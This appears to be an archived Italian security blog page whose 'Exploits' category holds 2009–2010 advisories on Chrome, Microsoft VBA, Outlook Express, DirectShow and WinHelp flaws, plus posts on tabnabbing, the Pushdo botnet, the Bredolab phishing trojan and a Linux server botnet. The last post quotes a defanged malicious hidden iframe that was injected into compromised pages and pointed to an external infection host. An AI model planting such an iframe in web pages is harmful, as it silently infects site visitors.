Exploits

Vulnerabilita’ multiple in Google Chrome

Inserito da 6 Luglio, 2010 (0) Commenti

Si tratta di :Exploits

Titolo : Vulnerabilita’ multiple in Google Chrome

******************************

************************************

:: Descrizione del problema:

Sono state riscontrate vulnerabilita’ multiple in Google Chrome, che
potrebbero essere sfruttate da attaccanti remoti per oltrepassare
restrizioni, accedere ad informazioni sensibili o per compromettere un
sistema vulnerabile.

Per una descrizione completa delle vulnerabilita’ fare riferimento alla
segnalazione ufficiale.

:: Software interessato:

Google Chrome versioni precedenti la 5.0.375.99

:: Impatto:

Cross Site Scripting
Accesso al sistema
Possibile compromissione del sistema
Sensitive information disclosure
Denial of Service

:: Soluzioni:

Aggiornare Google Chrome alla versione 5.0.375.99 :
http://www.google.com/chrome

:: Riferimenti:

Google Chrome:
http://googlechromereleases.blogspot.com/2010/07/stable-channel-update.html

Secunia:
http://secunia.com/advisories/40479/

VuPen:
http://www.vupen.com/english/advisories/2010/1685

Categories : Exploits Tags : , ,

Vulnerabilita’ multiple in Google Chrome

Inserito da 28 Maggio, 2010 (0) Commenti

Si tratta di :Exploits,Sicurezza

:: Descrizione del problema:

Sono state riscontrate vulnerabilita’ multiple in Google Chrome, che
potrebbero essere sfruttate da attaccanti remoti per oltrepassare
restrizioni, accedere ad informazioni sensibili o per compromettere un
sistema vulnerabile.

Per una descrizione completa delle vulnerabilita’ fare riferimento alla
segnalazione ufficiale.

:: Software interessato:

Google Chrome versioni precedenti la 5.0.375.55

:: Impatto:

Cross Site Scripting
Accesso al sistema
Possibile compromissione del sistema
Sensitive information disclosure

:: Soluzioni:

Aggiornare Google Chrome alla versione 5.0.375.55:

http://www.google.com/chrome

:: Riferimenti:

Google Chrome:
http://googlechromereleases.blogspot.com/2010/05/stable-channel-update.html

Secunia:
http://secunia.com/advisories/39882

VuPen:
http://www.vupen.com/english/advisories/2010/1254

Categories : Exploits,Sicurezza Tags :

nuove tecniche di phishing scoperto il tabnabbing grazie a Aza Raskin exploits tabnabbing Phishing

Inserito da 26 Maggio, 2010 (0) Commenti

Si tratta di :Exploits,Phishing e Truffe

Italian Language english version

scoperta una nuova tecnica per attuare attacchi di phishing e implementare script maligni nella pagine.

Aza Raskin Creative lead del team firefox ha annunciato che è possibile effettuare il tabnabbing, in due parole di cosa si tratta ?

L’attacco è elegante e semplice: un utente che ha più schede aperte nel browser e visita un sito appositamente predisposto con un codice javascript e si sposta da un tab all’altro, può essere redirezionato arbitrariamente da un tab con una pagina all’altra. (il tab è  la linguetta, le schede , si chiama tab in programmazione)

L’intelligenza del codice javascript sta nel poter accedere alla cronologia e personalizzare l’attacco di phishing, quindi se usate il pc per accedere al conto on line della vistra banca si aprirà una pagina clone, attenzione guardate sempre bene il lucchetto e controllate chi ha emesso il certificato ssl, oltre che guardare l’indirizzo nella barra del browser .

Questa tecnica raffinata è stata commentata anche dall’esperto Aviv Raff che ha fornito particolari sfiziosi per i curiosoni riporto il link:

http://avivraff.com/research/phish/article.php?854817837

se volete scaricare il codice e studiare l’exploit

http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/

Categories : Exploits,Phishing e Truffe Tags : , , ,

Vulnerabilita’ in Visual Basic for Applications

Inserito da 12 Maggio, 2010 (0) Commenti

Si tratta di :Exploits

: Descrizione del problema

Microsoft ha rilasciato un aggiornamento di sicurezza che risolve
una vulnerabilita’in Microsoft Visual Basic, Applications Edition.

La vulnerabilita’ puo’ consentire l’esecuzione di codice in modalita’
remota se un’applicazione host apre e inoltra un file appositamente
predisposto a Visual Basic, Applications Edition. Se un utente e’
connesso con privilegi di amministrazione, un utente malintenzionato
che sfrutti questa vulnerabilita’ puo’ assumere il controllo
completo del sistema interessato. Pertanto, gli utenti con account
configurati in modo da disporre solo di diritti limitati sono
esposti all’attacco in misura inferiore rispetto a quelli che
operano con privilegi di amministrazione.

:: Software e sistemi interessati

Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
2007 Microsoft Office System Service Pack 1
2007 Microsoft Office System Service Pack 2
Microsoft Visual Basic for Applications
Microsoft Visual Basic for Applications SDK

:: Impatto

Esecuzione di codice arbitrario
Compromissione del sistema

:: Soluzioni

Installare manualmente la patch elencata nel bollettino Microsoft,
oppure utilizzare uno degli strumenti di aggiornamento come:
Aggiornamenti Automatici, Windows Update, Microsoft Update,
Windows Server Update Services.

L’articolo della Microsoft Knowledge Base 978213 descrive i problemi
attualmente conosciuti che gli utenti potrebbero riscontrare durante
l’installazione di questo aggiornamento per la protezione.
L’articolo illustra inoltre le soluzioni consigliate in grado di
risolvere questi problemi.

:: Riferimenti

Microsoft Security Bulletin MS10-031
http://www.microsoft.com/technet/security/Bulletin/MS10-031.mspx

VUPEN
http://www.vupen.com/english/advisories/2010/1121

Security Focus
http://www.securityfocus.com/bid/39931

Mitre’s CVE ID
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0815

Categories : Exploits Tags : ,

aggiornamento di sicurezza che risolve una vulnerabilita’ in Outlook Express, Windows Mail e Windows Live Mail

Inserito da 12 Maggio, 2010 (0) Commenti

Si tratta di :Exploits

:: Descrizione del problema

Microsoft ha rilasciato un aggiornamento di sicurezza che risolve
una vulnerabilita’ in Outlook Express, Windows Mail e Windows Live
Mail.

La vulnerabilita’ puo’ consentire l’esecuzione di codice in
modalita’ remota se un utente visita un server di posta elettronica
malevolo. Sfruttando questa vulnerabilita’, un utente
malintenzionato puo’ ottenere gli stessi diritti utente dell’utente
locale. Pertanto, gli utenti con account configurati in modo da
disporre solo di diritti limitati sono esposti all’attacco in misura
inferiore rispetto a quelli che operano con privilegi di
amministrazione.

:: Software e sistemi interessati

Microsoft Outlook Express 5.5 Service Pack 2
Microsoft Outlook Express 6 Service Pack 1
Microsoft Outlook Express 6
Microsoft Windows Mail
Microsoft Windows Live Mail

Microsoft Windows 2000 Service Pack 4
Microsoft Windows XP Service Pack 2
Microsoft Windows XP Service Pack 3
Microsoft Windows XP Professional x64 Edition Service Pack 2
Microsoft Windows Server 2003 Service Pack 2
Microsoft Windows Server 2003 x64 Edition Service Pack 2
Microsoft Windows Server 2003 SP2 (Itanium)
Microsoft Windows Vista Service Pack 1
Microsoft Windows Vista Service Pack 2
Microsoft Windows Vista x64 Edition Service Pack 1
Microsoft Windows Vista x64 Edition Service Pack 2
Microsoft Windows Server 2008 (32-bit)
Microsoft Windows Server 2008 (32-bit) Service Pack 2
Microsoft Windows Server 2008 (x64)
Microsoft Windows Server 2008 (x64) Service Pack 2
Microsoft Windows Server 2008 (Itanium)
Microsoft Windows Server 2008 (Itanium) Service Pack 2
Microsoft Windows 7 (32-bit)
Microsoft Windows 7 (x64)
Microsoft Windows Server 2008 R2 (x64)
Microsoft Windows Server 2008 R2 (Itanium)

:: Impatto

Esecuzione di codice arbitrario
Denial of service
Compromissione del sistema

:: Soluzioni

Installare manualmente la patch elencata nel bollettino Microsoft,
oppure utilizzare uno degli strumenti di aggiornamento come:
Aggiornamenti Automatici, Windows Update, Microsoft Update,
Windows Server Update Services.

:: Riferimenti

Microsoft Security Bulletin MS10-030
http://www.microsoft.com/technet/security/Bulletin/MS10-030.mspx

VUPEN
http://www.vupen.com/english/advisories/2010/1111

Security Focus
http://www.securityfocus.com/bid/39927

Mitre’s CVE ID
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0816

Categories : Exploits Tags : ,

Non Premete F1 in un computer con Windows Xp se usate Internet Explorer

Inserito da 3 Marzo, 2010 (0) Commenti

Si tratta di :Exploits,Sicurezza

il ricercatore polacco Maurycy Prodeus, analista di iSEC Security Research, ha scoperto un interessante falla che può consentire ad un malintezionato di sfruttare una vulnerabilità presente nel sistema della guida in linea di windows. La vulnerabilità verrebbe azionata dalla semplice pressione del tasto F1. il sistema operativo affetto da questa problematica è windows Xp Sp3. Il meccanismo è semplice è basato su file VBScript che interagiscono con i file della guida che vengono lanciati attraverso internet explorer.
In pratica si fa caricare un file della guida da remoto per consentire all’aggressore di generare un overflow dell’applicazione winhlp32 per eseguire codice arbitrario con i diritti dell’utente corrente.

Si consiglia vivamente di bloccare l’accesso alla porta 445.
Le versioni interessate sono sia IE 6,  IE7 che IE8.
i computer con installato Windows Vista, Windows 7, Windows Server 2008 e Windows Server 2008 R2 non sono affetti da questa problematica e a dire il vero se si usa un browser alternativo tipo mozilla firefox non si dovrebbe incappare in questo bug.

Categories : Exploits,Sicurezza Tags : , , , , , , ,

attenzione : Vulnerabilita’ in Microsoft DirectShow, apri il video e sei fritto….

Inserito da 12 Febbraio, 2010 (0) Commenti

Si tratta di :Exploits

attenzione : Vulnerabilita’ in Microsoft DirectShow
****************************************************************** :: Descrizione del problema
Microsoft ha rilasciato un aggiornamento per risolvere una   vulnerabilita’ di tipo heap overflow presente in Microsoft DirectShow.
La vulnerabilita’ potrebbe consentire l’esecuzione remota di   codice arbitrario se l’utente apre un file AVI artefatto,   anche durante la navigazione sul web.
Software interessato
Windows 2000 SP4
Windows XP SP2
Windows XP SP3
Windows XP Pro x64 Edition SP2
Windows Vista   Windows Vista SP1
Windows Vista SP2
Windows Vista x64 Edition
Windows Vista x64 Edition SP1
Windows Vista x64 Edition SP2   Windows 7 (32-bit)   Windows 7 (x64)
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Server 2003 SP2 (Itanium)
Windows Server 2008 (32-bit)
Windows Server 2008 (32-bit) SP2
Windows Server 2008 (x64)
Windows Server 2008 (x64) SP2
Windows Server 2008 (Itanium)
Windows Server 2008 (Itanium) SP2
Windows Server 2008 R2 (x64)
Windows Server 2008 R2 (Itanium)

Impatto :
Esecuzione remota di codice arbitrario
Conquista del controllo sul sistema
:: Soluzioni
Installare manualmente la patch elencata nel bollettino Microsoft,   oppure utilizzare uno degli strumenti di aggiornamento come:   Aggiornamenti Automatici, Windows Update, Microsoft Update,   Windows Server Update Services, Systems Management Server.
:: Riferimenti
Microsoft Security Bulletin   http://www.microsoft.com/technet/security/Bulletin/MS10-013.mspx
Microsoft Knowledge Base
http://support.microsoft.com/kb/977935
Microsoft Update e Aggiornamenti Automatici
http://go.microsoft.com/fwlink/?LinkID=40747
https://www.update.microsoft.com/microsoftupdate/v6/   http://support.microsoft.com/kb/306525/
TippingPoint Zero Day Initiative
http://www.zerodayinitiative.com/advisories/ZDI-10-015/
Mitre’s CVE ID   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0250   Vupen Security   http://www.vupen.com/english/advisories/2010/0346
ISC SANS   http://isc.sans.org/diary.html?storyid=8197

Categories : Exploits Tags : , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,

la saturazione della banda secondo Pushdo…

Inserito da 2 Febbraio, 2010 (0) Commenti

Si tratta di :Exploits,Sicurezza

Internet è una risorsa comune, dove è facile
incontrare colossi che cercano di accaparrarsi
range di ip, fette di mercato e connettività…
Per un altro verso c’è gente che studia come
farci crollare quelle poche certezze che
ci siamo costruiti.
Oggi vi presento la botnet Pushdoo una botnet
rete di computer inteconnessi che tramite sofisticate tecniche di
interconnessione è in grado di sovraccaricare e mettere in ginocchio
network della portata di Paypal e Cia,l’attacco
appare molto semplice ci sono migliaia di richieste tramite protocollo
ssl, connessione sicura, quindi esigente in termini di risorse a network
veramente estesi e la cosa singolare e che nel medesimo momento migliaia
di ip collegati da tutto il mondo sovraccaricano provocando
una saturazione della banda con un conseguente rallentamento o peggio
blocco si servizi importanti come Paypal…
Detto questo: visto che secondo la teoria economica le risorse sono scarse, visto
che gli indirizzi ipv4 sono “finiti” che dire…
Mi rimetto a voi maghi del web, sapientoni
del mondo informatico, Chief security manager, multinazionali e colossi
pronti a fregare linfa creativa a noi poveri privi di disponibilità e risorse tecnologiche
vediamo cosa siete in grado di fare di fronte a questa nuova minaccia che se perfezionata
potrebbe poratere all’implosione di una struttura ormai vecchia !!! e bisognosa di nuove regole
e accorgimenti per una connettività razionale ed efficiente.

Categories : Exploits,Sicurezza Tags : , , , ,

facebook e il trojan “Bredolab”

Inserito da 30 Ottobre, 2009 (0) Commenti

Si tratta di :Exploits

attenzione Pericolo per gli utenti di facebook !

se ricevete una mail con oggetto “Password Reset Confirmation Email”

da l’indirizzo apparente service@facebook.com magari con scritto The Facebook Team siete vittime di una tragica presa in giro.

a peggiorare la situazione intervengono alcuni fantomatici esperti che faendosi trascinare dal fatto che questa email sembra vera assicurano che è genuina e tutti potete cliccare su questi messaggi senza incorrere in nessuna minuccia.
Poi si continua nel tam tam che sta investendo la rete si sostiene in diversi siti che solo una decina di software antivirus sono in grado di scovare questo trojan contenuto nel corpo del messaggio perchè solo dopo si capisce leggendo pagine e pagine che c’è qualcosa che non va in questi messaggi misteriosi alcuni in italiano alcuni in inglese che stanno arrivando agli utenti registrati su facebook.

In poche parole è una e-mail che serve per carpire dati sensibili dai vostri account, e accedere al vostro computer il worm Bredolab incluso nel messaggio che viene spacciato per vero diche che per la sicurezza dei propri iscritti è necessario  sostituire utente e password per l’accesso alla piattaforma facebook, ma qui sta la furbata la password da inserire la suggerisce chi ha scritto la mail spacciandosi per il team di facebook.

In poche parole basta che l’utente medio voglia a suo modo approfondire la faccenda e si appresta a cliccare il virus worm entra in azione trasformando il pc in una spazzatura che patcha i file  “svchost.exe” ed “explorer.exe” e facendo tale operazione a volte vengono elusi molti software antivirus che pur restando attivi, non fanno il proprio lavoro es. di norma il firewall legittima il traffico per tali processi considerati parte essenziale del sistema.
Una volta che i software antivirus e i relativi firewall vengono “rincitrulliti” il malware inizia a scaricare altro codice maligno che fa diventare il pc dell’utente una macchina zombie al servizio di terzi.

Un consiglio analizzate sempre le e-mail che vi arrivano, cercate di scoprire quale server è stato utilizzato prima di ridurre il vostro pc in una specie di vecchio soprammobile o a vostra scelta in una lavabiancheria rotta .

consigli
1) eliminare il messaggio

2) non aprire nessun allegato da sconosciuti
3) non cedere credenziali a terzi e poi gridare al lupo al lupo…
4)lavatevi la faccia prima di mettervi davanti al pc

Categories : Exploits Tags : , , , ,

Nuovo attacco ai server web Linux, botnet via iframe apache e nginx

Inserito da 15 Settembre, 2009 (0) Commenti

Si tratta di :Exploits

Denis Sinegubko, si occupa di sicurezza in Russia, ha scoperto un gruppo di circa 100 server Linux infetti (una botnet) interconnessi tra loro. Si tratta di un gruppo di server web infetti e connessi tra loro che diffondono malware, con lo scopo di creare una rete di computer (server web) che infettano i visitatori di siti web, questa attività è stata scoperta analizzando alcuni server con installato apache con password di root facili, combinando mediante la tecnica iframe server esterni con installato il server nginx si è potuto inserire con successo nelle pagine stringhe all’interno del server vittima fatte in questa maniera :

<i_frame src="http ://a86x . homeunix . org:8080/ts/in.cgi?open2" width=997 height=0 style="visibility: hidden"></iframe>

Tale tecnica non fa altro che aumentare le macchine zombie.

Cosa avviene in parole semplici :

i server infetti osservati da Sinegubko legittimano il traffico web sulla porta 80,
la porta standard tcp per le connessioni al server. Il server rogue che gira avendo  installato nginx  potente server  http e un mail proxy  server sviluppato in russia da Igor Sysoev fa in modo che i computer degli utenti vengano infettati.
A complicare le cose e per aumentare la potenza virale ci si è messo pure l’aggiunta di reti basate su servizi che permettono la rintracciabilità di un computer in rete, ciò significa che esiste una rete di server tracciabile e una rete di computer che potenzialmente non avendo hosting fisso possono cambiare rapidamente dislocazione geografica.

Il tutto significa che nel momento in cui si lancia un comando alla botnet tutti i server infetti rispondono.

Secondo Sinegubko la responsabilità di tale diffusione è tutta degli amministratori di rete che mettono password poco sicure o che non proteggono il traffico di rete da eventuali sniffaggi di password di root.

Categories : Exploits Tags : , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,